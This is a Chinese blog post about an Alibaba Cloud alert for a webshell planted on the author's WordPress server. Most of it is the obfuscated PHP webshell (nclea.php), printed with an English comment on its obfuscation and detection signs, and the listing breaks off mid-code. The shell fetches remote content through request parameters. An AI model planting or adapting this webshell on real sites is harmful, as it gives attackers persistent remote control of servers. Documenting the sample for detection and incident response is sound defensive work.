
记录一次因 WordPress 服务器被黑的事件

其实不是 WordPress 系统的锅子,还是自身安全意识薄弱的原因。事件大致是这样的:

晚上11点多接到阿里云紧急告警,立马登录后台查看,告警内容如下

网站后门-发现后门(Webshell)文件阻断成功
备注
该告警由如下引擎检测发现:
木马文件路径:/www/nclea.php
影响域名:–
首次发现时间:2020-04-21 23:14:30
更新时间:2020-04-21 23:47:55
木马类型:Webshell
源文件下载:下载

发现一个后门 nclea.php 文件,马上登录服务器查看,发现 web 目录新增了三个文件,部分文件内容如下

<?php
// NOTE(review): obfuscated PHP webshell sample (the /www/nclea.php file from the alert above),
// kept byte-for-byte for reference. The page has line-wrapped the listing, so several statements
// are cut mid-token (e.g. the `$O0OO0_O_0_{13}` chain and the `return` before `\'\';}`); it is
// not runnable as printed.
// How the obfuscation works, as far as the visible text shows:
//  - the 38-char string assigned two statements below is a lookup table; every `$O…` variable is
//    built by indexing into it with the `{n}` string-offset syntax (deprecated in PHP 7.4, removed
//    in PHP 8.0), so the sample assumes an older runtime;
//  - every call goes through `${"\x47\x4c\x4f\x42\x41\x4c\x53"}[...]`, i.e. `$GLOBALS` with a
//    hex-escaped variable name, so no built-in function name appears literally and a plain
//    keyword grep misses it; `header('Content-Type:…')` and the CURLOPT_*, AF_INET /
//    SOCK_STREAM and 0644 constants are the only identifiers left in clear;
//  - inputs are taken from `$_GET` (hex-escaped as `${"\x5f\x47\x45\x54"}`), `$_REQUEST`
//    (keys "\x66", "\x67", "\x64") and `$_SERVER` DOCUMENT_ROOT, i.e. the shell is driven by
//    request parameters and works relative to the web root.
// Detection / response: the hex-keyed `$GLOBALS` indirection and the offset-table string assembly
// are high-signal indicators for file scanning; keep a copy (the alert offers a download) before
// deleting, so the other dropped files can later be correlated by modification time.
$OO_OO_00_0='1';
$O0OO0_O_0_="85gwl3qu9pv1koimbf2ceds_x7y6nt4ajrz0-h";$O_00OO0__O=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{14}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29};$O0_00__OOO=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{31}.$O0OO0_O_0_{23}.$O0OO0_O_0_{21}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{31};$OOO00_O_0_=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{16}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{2};$OOO00__O0_=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20}.$O0OO0_O_0_{13}.$O0OO0_O_0_{7}.$O0OO0_O_0_{29};$OO0_O_O0_0=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{9}.$O0OO0_O_0_{7}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O00O_0OO__=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O_000O__OO=$O0OO0_O_0_{17}.$O0OO0_O_0_{7}.$O0OO0_O_0_{28}.$O0OO0_O_0_{19}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O
0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{14}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O0_OO_00O_=$O0OO0_O_0_{19}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{17}.$O0OO0_O_0_{7}.$O0OO0_O_0_{28}.$O0OO0_O_0_{19}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28};$O__O_O0O00=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{28}.$O0OO0_O_0_{20}.$O0OO0_O_0_{19}.$O0OO0_O_0_{29};$OO_0__0OO0=$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{37}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{16}.$O0OO0_O_0_{26}.$O0OO0_O_0_{28}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20};$O__0_0OO0O=$O0OO0_O_0_{16}.$O0OO0_O_0_{31}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{27}.$O0OO0_O_0_{30}.$O0OO0_O_0_{23}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20};$OO__O0O_00=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{3}.$O0OO0_O_0_{33}.$O0OO0_O_0_{14}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20};$O00O0__OO_=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20};$O0O00__O_O=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{23}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{9}.$O0OO0_O_0_{4}.$O0OO0_O_0_{31}.$O0OO0_O_0_{19}.$O0OO0_O_0_{20};$O_OOO_000_=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{21};$OO0OO0_0__=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{14}.$O0OO0_O_0_{2
2}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O0OOO_0__0=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{13}.$O0OO0_O_0_{9}.$O0OO0_O_0_{29};$O0O00O___O=$O0OO0_O_0_{31}.$O0OO0_O_0_{33}.$O0OO0_O_0_{33}.$O0OO0_O_0_{31}.$O0OO0_O_0_{26}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{37}.$O0OO0_O_0_{14}.$O0OO0_O_0_{17}.$O0OO0_O_0_{29};$O_O_00_O0O=$O0OO0_O_0_{9}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{2}.$O0OO0_O_0_{23}.$O0OO0_O_0_{15}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{19}.$O0OO0_O_0_{37};$O__00O_OO0=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{33}.$O0OO0_O_0_{33}.$O0OO0_O_0_{13}.$O0OO0_O_0_{33};$O_00OO_0O_=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20};$OO__O00O0_=$O0OO0_O_0_{9}.$O0OO0_O_0_{31}.$O0OO0_O_0_{33}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4};$OO00OO___0=$O0OO0_O_0_{2}.$O0OO0_O_0_{34}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{17}.$O0OO0_O_0_{4}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20};$O__OO00_0O=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{15}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20};$O_0_OO_00O=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{14}.$O0OO0_O_0_{29};$OOO__O0_00=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{20}.$O0OO0_O_0_{19};$OO_0_0_OO0=$O0OO0_O_0_{15}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{33}.$O0OO0_O_0_{31}.$O0OO0_O_0_{28}.$O0OO0_O_0_{21};$O0OO0O0___=$O0OO0_O_0_{14}.$O0OO0_O_0_{15}.$O0OO0_O_0_{9}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20};$O00__O_O0O=$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{9}.$O0OO0_O
_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20};$O0O0_0_O_O=$O0OO0_O_0_{7}.$O0OO0_O_0_{22}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{20}.$O0OO0_O_0_{9};$O_O_0O0_O0=$O0OO0_O_0_{7}.$O0OO0_O_0_{28}.$O0OO0_O_0_{4}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{12};$O0O0_OO__0=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33};$OO0_0_0_OO=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28};$O__O00_OO0=$O0OO0_O_0_{17}.$O0OO0_O_0_{3}.$O0OO0_O_0_{33}.$O0OO0_O_0_{14}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20};$O_O0OO__00=$O0OO0_O_0_{17}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20};$O0OO00O___=$O0OO0_O_0_{29}.$O0OO0_O_0_{13}.$O0OO0_O_0_{7}.$O0OO0_O_0_{19}.$O0OO0_O_0_{37};$OO0O__00O_=$O0OO0_O_0_{17}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{21};$O00O_0_OO_=$O0OO0_O_0_{17}.$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$OO_O_000_O=$O0OO0_O_0_{19}.$O0OO0_O_0_{37}.$O0OO0_O_0_{15}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21};$O_00O_O0O_=$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{14}.$O0OO0_O_0_{15};$O_0__0OOO0=$O0OO0_O_0_{32}.$O0OO0_O_0_{13}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28};$O_OO00__0O=$O0OO0_O_0_{17}.$O0OO0_O_0_{20}.$O0OO0_O_0_{13}.$O0OO0_O_0_{17};header('Content-Type:text/html;charset=utf-8');;$OO0O00__O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f\x5f"]('$O0_O_OO_00=\'\',$O_0OO00__O=NULL,$O__0OO0O_0=array()','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x30\x4f"]("/^http\\:\\/\\//si",$O0_O_OO_00)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x71\x71"])){$OO_0__OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$OO_0__OO00.=$O0_O_OO_00;echo $OO_0__OO00;unset($OO_0__OO00);exit();}return 
\'\';}$O_0O0O__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$O_0_O0OO_0=$O0O_0_OO_0=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30\x4f"](\'|\',$O_0O0O__0O) as $c){$O0O_O_O00_=1;foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30\x4f"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f"]($d)){$O0O_O_O00_=0;}}unset($d);if($O0O_O_O00_){$O_0_O0OO_0=$c;break;}}unset($O_0O0O__0O,$c);if($O_0_O0OO_0==\'\'){return 0;}if(substr($O_0_O0OO_0,0,1)==\'c\'){$O0O00_O__O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_URL,$O0_O_OO_00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_USERAGENT,\'WHR\');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_TIMEOUT,100);$O__O0_O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O0O00_O__O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x4f\x5f\x30\x4f\x5f"]($O0O00_O__O);if(!$O__O0_O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$OO_0__OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Sy4tyhTlFILSrtPKLwIA\');$OO_0__OO00.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x5f\x4f\x4f\x30"]($O0O00_O__O);echo $OO_0__OO00;unset($OO_0__OO00);exit();}return 
0;}else{$O__O0_O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"]($O__O0_O00O,"\\xEF\\xBB\\xBF"));return $O__O0_O00O;}}$O_O0O0O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x4f\x30\x5f"]($O0_O_OO_00);isset($O_O0O0O0__["\x68\x6f\x73\x74"])||$O_O0O0O0__["\x68\x6f\x73\x74"]=\'\';isset($O_O0O0O0__["\x70\x61\x74\x68"])||$O_O0O0O0__["\x70\x61\x74\x68"]=\'\';isset($O_O0O0O0__["\x71\x75\x65\x72\x79"])|| $O_O0O0O0__["\x71\x75\x65\x72\x79"]=\'\';isset($O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"])||$O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"]=\'\';$O0OO__00O_=$O_O0O0O0__["\x70\x61\x74\x68"]?$O_O0O0O0__["\x70\x61\x74\x68"].($O_O0O0O0__["\x71\x75\x65\x72\x79"]?\'?\'.$O_O0O0O0__["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OO0_00__OO=$O_O0O0O0__["\x68\x6f\x73\x74"];if($O_O0O0O0__["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O_00O_O_0O=\'1.1\';$O0_OOO_0_0=empty($O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"])?443:$O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"];$OO0_00__OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Ky7OshTdLtPXBwA=\');$OO0_00__OO.=$O_O0O0O0__["\x68\x6f\x73\x74"];}else{$O_00O_O_0O=\'1.0\';$O0_OOO_0_0=empty($O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"])?80:$O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"];}$OO0OO_0__0=\'Host:\';$OO0OO_0__0.=$OO0_00__OO;$O__0OO0O_0[]=$OO0OO_0__0;$O__0OO0O_0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$O__0OO0O_0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Cy1OLhTdJ1TE/NK7EK9wgtPCAA==\');$O__0OO0O_0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'c0xOThTi0osdLtPS1wIA\');unset($OO0OO_0__0);$O0O_0_OO_0="GET $O0OO__00O_ 
HTTP/$O_00O_O_0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f\x4f\x30"]("\\r\\n",$O__0OO0O_0)."\\r\\n\\r\\n";unset($O__0OO0O_0,$O_O0O0O0__,$O_00O_O_0O,$O0OO__00O_);$OO_00O0_O_=null;if(substr($O_0_O0OO_0,-1)==\'n\'){$OO_00O0_O_=$O_0_O0OO_0($OO0_00__OO,$O0_OOO_0_0,$OO_0__OO00no,$OO_0__OO00str,30);}else{if(substr($O_0_O0OO_0,-1)==\'t\'){$O_0_O0O0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'K0kushTNLtPXBwA=\');$O_0_O0O0_O.=$OO0_00__OO;$O_0_O0O0_O.=\':\';$O_0_O0O0_O.=$O0_OOO_0_0;$OO_00O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x4f\x30\x5f\x5f\x4f"]($O_0_O0O0_O,$OO_0__OO00no,$OO_0__OO00str,30);unset($O_0_O0O0_O);}}$O0O0O0O___=\'\';if($OO_00O0_O_){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x5f\x4f\x5f\x30\x5f"]($OO_00O0_O_,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x5f\x5f\x4f\x30\x5f"]($OO_00O0_O_,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x5f\x4f\x4f\x30"]($OO_00O0_O_,$O0O_0_OO_0);$O__0O0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x5f\x5f\x4f\x4f\x4f"]($OO_00O0_O_);if(!$O__0O0_O0O["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x30\x5f\x5f\x30\x4f"]($OO_00O0_O_)){$OO0_O0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x5f\x4f\x4f\x5f"]($OO_00O0_O_);if($OO0_O0__O0&&($OO0_O0__O0=="\\r\\n"||$OO0_O0__O0=="\\n")){break;}unset($OO0_O0__O0);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x30\x5f\x5f\x30\x4f"]($OO_00O0_O_)){$O00OO___0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x30\x30\x4f\x5f"]($OO_00O0_O_,8192);$O0O0O0O___.=$O00OO___0O;unset($O00OO___0O);}}unset($O__0O0_O0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30"]($OO_00O0_O_);}else{if(substr($O_0_O0OO_0,-1)==\'e\'){$OOO_000O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f\x30"]($OO0_00__OO);$OO_00O0_O_=$O_
0_O0OO_0(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x5f\x4f\x30\x4f\x30\x30"]($OO_00O0_O_,$OOO_000O__,$O0_OOO_0_0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x4f\x5f\x30\x30"]($OO_00O0_O_,$O0O_0_OO_0,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x5f\x30\x5f\x4f\x4f"]($O0O_0_OO_0));while($O00O__OO0_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x4f\x5f\x30\x30\x30\x5f"]($OO_00O0_O_,8192)){$O0O0O0O___.=$O00O__OO0_;unset($O00O__OO0_);}$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30\x4f"]("\\r\\n\\r\\n",$O0O0O0O___);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x4f\x5f\x5f\x5f\x4f"]($O0O0O0O___);$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\x5f\x5f"]("\\r\\n\\r\\n",$O0O0O0O___);$O0OO0_0O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x4f\x4f\x30"](2,5);$OO__0O_O00=0;while($OO__0O_O00<$O0OO0_0O__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x4f\x5f\x30\x30"]($OO_00O0_O_,$O0O_0_OO_0,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x5f\x30\x5f\x4f\x4f"]($O0O_0_OO_0));$OO__0O_O00++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x5f\x4f\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($OO__0O_O00,$O0OO0_0O__);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x4f\x4f\x5f"]($OO_00O0_O_);unset($OOO_000O__);}}if($O0O0O0O___==\'\'){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]) and $O0_O_OO_00){$O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]($O0_O_OO_00);}}unset($O0O_0_OO_0,$O_0_O0OO_0,$OO_00O0_O_,$O0_OOO_0_0,$OO0_00__OO);return 
